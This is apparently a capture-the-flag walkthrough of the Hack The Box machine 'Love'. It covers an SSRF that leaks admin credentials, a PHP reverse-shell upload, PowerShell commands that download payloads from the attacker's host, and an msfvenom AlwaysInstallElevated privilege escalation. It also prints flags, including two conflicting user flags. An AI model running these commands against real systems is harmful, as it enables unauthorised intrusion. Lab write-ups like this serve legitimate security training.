Name: | Love |
---|---|
Release Date: | 01 May 2021 |
Retire Date: | 07 Aug 2021 |
OS: | Windows |
Base Points: | Easy - Retired [0] |
Rated Difficulty: | |
Radar Graph: | |
Tartofraise 00 days, 00 hours, 08 mins, 48 seconds | |
celesian 00 days, 00 hours, 18 mins, 12 seconds | |
Creator: | pwnmeow |
Pentest Workstation PDF: | Love.pdf |
Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.10.239
Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.
We have several ports open on this box and many are running some form of web server. Looking at the SSL checks performed on HTTPS TCP 443, we see there are a few hostnames, so let's begin by adding them to /etc/hosts
sudo vi /etc/hosts
10.10.10.239 www.love.htb staging.love.htb
Now that we have that out of the way, we'll need to re-run Gobuster but on the hostnames instead of the IP addresses. However, none of the Gobuster output is helpful on this box. Let's see about manual navigation.
http://www.love.htb
http://staging.love.htb
http://staging.love.htb/beta.php (found by clicking Demo)
http://www.love.htb:5000
So, 5000 is forbidden from direct navigation, but the Malware Scanner may be a potential attack point for LFI or calling localhost (since it is scanning the localhost) on the 5000 port to see if anything returns a response. Sure enough, if we call http://127.0.0.1:5000, we DO get a response and it just happens to have admin credentials! Nice!
Vote Admin Creds admin: @LoveIsInTheAir!!!!
Now that we have admin credentials to the Voting system, we try to log in. Now that we are logged in, let's check oout searchsploit and see if there's anything we can use and sure enough php/webapps/49445.py is an authenticated File Upload RCE exploit that should get us a foothold on the box. After trying a few times on different ports, the exploit fails. So, I'm going to show the manual method of exploiting the File Upload RCE. Looking around the admin portal, we see that we can update our profile picture and since the system is running PHP, I'm going to generate a reverse shell in PHP for Windows and also attempt to upload a Windows shell to stabilize the shell. I used the one:
https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/master/src/php_reverse_shell.php
and set my netcat listener to 1234, a web server on 8080, and another nc listener to 1337. Upload the windows-php-reverse-shell, run "powershell (New-Object Net.Webclient).DownloadFile('http://<YOUR TUN0 IP>:8080/shell.exe','shell.exe')" and we have a shell (a stable one) as phoebe.
C:\Users\Phoebe\Desktop>type user.txt
type user.txt
f940d46fc5ebd612957465d566d977d4
C:\Users\Phoebe\Desktop>whoami
whoami
love\phoebe
Getting systeminfo and checking different interesting files, we find some credentials in C:\xampp\htdocs\omrs\includes\conn.php for phoebe.
<?php
$conn = new mysqli('localhost', 'phoebe', 'HTB#9826^(_', 'votesystem');
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
?>
We keep enumerating the machine and, through WINPeas, we find that AlwaysInstallElevated is set to True! That's an easy attack vector, especially with WINPeas gives us the URL to the method!
msfvenom -p windows/adduser --platform windows -a x64 USER=PWNED PASS='Password1!' -f msi -o privesc.msi
Upload it using a slightly modified version of the earlier command:
powershell (New-Object Net.Webclient).DownloadFile('http://<YOUR TUN0 IP>:8080/privesc.msi','privesc.msi')
./privesc.msi
Then, connect using psexec.py:
┌──(kali㉿kali)-[~/Desktop/HTB/Love]
└─$ sudo python3 ./psexec.py PWNED:'Password1!'@10.10.10.239
Grab the root.txt flag and we're on to the next :D
C:\WINDOWS\system32>type C:\Users\Administrator\Desktop\root.txt
a51e897bef215b2daa16a43a93491d44
C:\WINDOWS\system32>type C:\Users\Administrator\Desktop\root.txt
a51e897bef215b2daa16a43a93491d44
C:\WINDOWS\system32>type C:\users\phoebe\desktop\user.txt
c32fcc8c5758eefd525c268af3b3c453